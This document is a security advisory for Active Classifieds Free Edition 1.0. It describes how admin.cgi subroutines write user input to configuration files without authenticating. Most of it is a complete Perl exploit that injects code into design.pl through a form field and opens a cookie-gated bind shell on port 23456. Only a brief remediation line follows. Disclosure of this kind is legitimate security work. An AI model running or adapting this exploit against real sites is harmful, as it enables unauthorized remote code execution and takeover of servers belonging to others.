|
Vulnerability Active Classifieds Affected Active Classifieds Free Edition 1.0 Description Igor Dobrovitski found following. Active Classifieds Free Edition from Active Web Suite Technologies fails to authenticate administrators, which allows unauthorized modification of configuration files, which in turn, allows remote arbitrary code execution. Active Classifieds Free Edition 1.0. Commercial versions may also be vulnerable. The problem is in some subroutines in library files that are added to 'admin.cgi' through the 'require' statement. Some subroutines will happily accept input from anyone without calling the authentication subroutine and make changes to the configuration files, which are require'd by the script too. Thus, anyone can change settings, including administrator's password. Of course, it is also possile to inject our own Perl code via user-supplied variables, which will be written into the configuration files and executed upon the next invocation of the script. sub edit_design_variables { &admin_login_check; ................. This subroutine, for example, will authenticate the administrator and print out the form. sub submit_edit_design_variables { &exclusive_lockfile(LOCK); open (DESIGN, ">$require_path/variables/design.pl"); ........................ This subroutine, however, won't bother with authentication and will write user input to 'design.pl' Exploit: #!/usr/bin/perl -w # exploit by Igor Dobrovitski noident@my-deja.com # This exploit will spawn an interactive shell on port 23456 # A configuration file that is added to the admin.cgi at runtime through 'require' statement # can be ovewritten. We can write to that file, but can't read it, so we simply restore # the default settings. If the administrator made changes to the file # 'websites/default/variables/design.pl', those changes will be lost and defaults restored. # Our shell code is also written to that file, but will only be executed if the password # cookie is supplied. Whoever else invokes the script won't trigger the shell. # Enjoy use Socket; $| = 1; #################################################################################################### $password = 'noident'; # Our cookie password, change it if you want, don't set to empty string # Some metacharacters, like quotes and '&' are filtered so the code looks a bit weird $exec_code = 'use Socket;$shell = (chr 47) . bin . (chr 47) . sh . (chr 32) . (chr 45) . (chr 105);socket(SOCK, PF_INET, SOCK_STREAM, 6);setsockopt(SOCK, SOL_SOCKET, SO_REUSEADDR, 1);$port=23456;bind(SOCK, sockaddr_in($port, INADDR_ANY));listen(SOCK, 1);a ccept (NEW, SOCK);if(!fork()){open STDIN, (chr 60) . (chr 38) . NEW; open STDOUT, (chr 62) . (chr 38) . NEW;open STDERR, (chr 62) . (chr 38) . NEW;exec $shell}else{close NEW;exit;}'; #################################################################################################### unless(defined $ARGV[0]) {die "Usage: $0 www.example.com/cgi-bin/blah/classifieds/admin.cgi\n"} $ARGV[0] =~ s|^(?:http://)*||; ($host, $scriptpath) = $ARGV[0] =~ m|^(.*?)(/.*)$|; my $form = makeform({ 'request' => 'submit_edit_design_variables', 'bgcolor' => '#FFFFFF', 'text' => '#000000', 'link' => 'navy', 'vlink' => '#aaaaaa', 'alink' => '#FFCC00', 'marginheight' => '0', 'marginwidth' => '0', 'topmargin' => '0', 'leftmargin' => '0', 'background' => '', 'table_width' => "600';\nif(\$ENV{HTTP_COOKIE} eq \'$password\'){$exec_code}\n\$blah = '", 'header_row_color' => '#666666', 'mouse_over_color' => '#DDDDDD', 'line_color' => '#C0C0C0', 'alternate_row_color' => '#EEEEEE', 'inverse_font_color' => '#FFFFFF', 'alternate_font_color' => '#666666', 'font_face' => 'arial, helvetica', 'small_font_size' => '1', 'standard_font_size' => '2', 'large_font_size' => '3', 'max_records_per_page' => '20', 'allow_show_all' => 'yes', 'display_ad_count' => 'yes', 'display_icons' => 'yes', 'display_ad_totals' => 'yes', 'display_ad_postdate' => 'yes', 'display_location' => 'yes', 'date_format' => '3', 'months' => 'January\nFebruary\nMarch\nApril\nMay\nJune\nJuly\nAugust\nSeptember\nOctober\nNovember\nDecember', 'shortmonths' => 'Jan\nFeb\nMar\nApr\nMay\nJun\nJul\nAug\nSept\nOct\nNov\nDec', 'weekdays' => 'Sunday\nMonday\nTuesday\nWednesday\nThursday\nFriday\nSaturday', 'years' => '2000\n2001\n2002\n2003\n2004', 'states' => 'Alabama\nAlaska\nArizona\nArkansas\nCalifornia\nColorado\nConnecticut\nDistrict of Columbia\nDelaware\nFlorida\nGeorgia\nGuam\nHawaii\nIdaho\nIllinois\nIndiana\nIowa\nKansas\nKentucky\nLouisiana\nMaine\nMaryland\nMassachusetts\nMichigan\n Minnesota\nMississippi\nMissouri\nMontana\nNebraska\nNevada\nNew Hampshire\nNew Jersey\nNew Mexico\nNew York\nNorth Carolina\nNorth Dakota\nOhio\nOklahoma\nOregon\nPennsylvania\nPuerto Rico\nRhode Island\nSouth Carolina\nSouth Dakota\nTennessee\nTexas\nUt ah\nVermont\nVirginia\nWashington\nWest Virginia\nWisconsin\nWyoming\n-------------------------\nCanada - Alberta\nCanada - British Columbia\nCanada - Manitoba\nCanada - New Brunswick\nCanada - Newfoundland\nCanada - Northwest Territories\nCanada - Nova S cotia\nCanada - Ontario\nCanada - Prince Edward Island\nCanada - Quebec\nCanada - Saskatchewan\nCanada - Yukon\n-------------------------\nUK - Channel Islands\nUK - England - London\nUK - England - Mid\nUK - England - North\n! UK - England - Southeast\nUK - England - Southwest\nUK - Isle of Man\nUK - Northern Ireland\nUK - Scotland\nUK - Wales\n-------------------------\nEurope - Eastern Europe\nEurope - France\nEurope - Germany\nEurope - Ireland\nEurope - Italy\nEurope - Nethe rlands\nEurope - Scandinavia\nEurope - Other\n-------------------------\nAsia and Pacific - Australia\nAsia and Pacific - India\nAsia and Pacific - Japan\nAsia and Pacific - New Zealand\nAsia and Pacific - Other\n-------------------------\nAfrica\nLatin A merica\nMiddle East\nOther Area' }); print "Engaging the enemy. Please stand by...\n"; for(my $i=0;$i<2;$i++) { # first time we overwrite the require'd file # second time we execute the script, the poisoned file is loaded, checks our cookie and # opens the backdoor for us. After that it exits without overwriting the file the 2nd time &send($form); } &oops_the_sploit_did_not_work(); sub makeform { my $string; my @blah; my $line = ''; my $here; my %data = %{$_[0]}; foreach my $key (keys %data) { $line .= "$key" . 'AAAA' . "$data{$key}" . 'BBBB'; } $line =~ s|^(.*)BBBB$|$1|; $line =~ s/\\n/\n/g; $line =~ s/\\t/\t/g; $line =~ s/\\e/\e/g; $line =~ s/\\f/\f/g; $line =~ s/\\r/\r/g; $line =~ s/\\0/\0/g; foreach my $char (split //, $line) { if($char !~ m/[A-Za-z0-9._ ]/) { $char = unpack "H2", $char; $char = '%' . "$char"; } push @blah, $char; } $string = join "",@blah; $string =~ s/AAAA/=/g; $string =~ s/BBBB/&/g; $string =~ s/ /+/g; my $cont_len = length($string); $here = <<EOF; POST $scriptpath HTTP/1.0 User-Agent: Mozilla (Windows 98) Host: $host cookie: $password Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Encoding: gzip Accept-Language: en Accept-Charset: iso-8859-1,*,utf-8 Content-type: application/x-www-form-urlencoded Content-length: $cont_len $string EOF return $here; } sub send { my $form_to_send = shift; my $h = inet_aton($host) or die "Forward lookup for $host failed\n"; socket(S,PF_INET,SOCK_STREAM,6) or die "socket prolems\n"; unless(connect(S,sockaddr_in(80,$h))) {print STDERR "Couldn't connect to " . inet_ntoa($h) . "\n" ; close(S); exit 1 } select(S); $|=1; print "$form_to_send"; local($SIG{ALRM}) = sub { print STDERR "Timeout was expected. The shell awaits you on port 23456\nHave fun and be excellent to the webmaster.\n"; exit }; alarm(20); my @reply=<S>; select(STDOUT); close(S); return @reply; } sub oops_the_sploit_did_not_work { print STDERR "The exploit didn't work on this host\nSorry...\n"; exit; } Solution There is no one-line solution to it. &admin_login_check should be called where appropriate.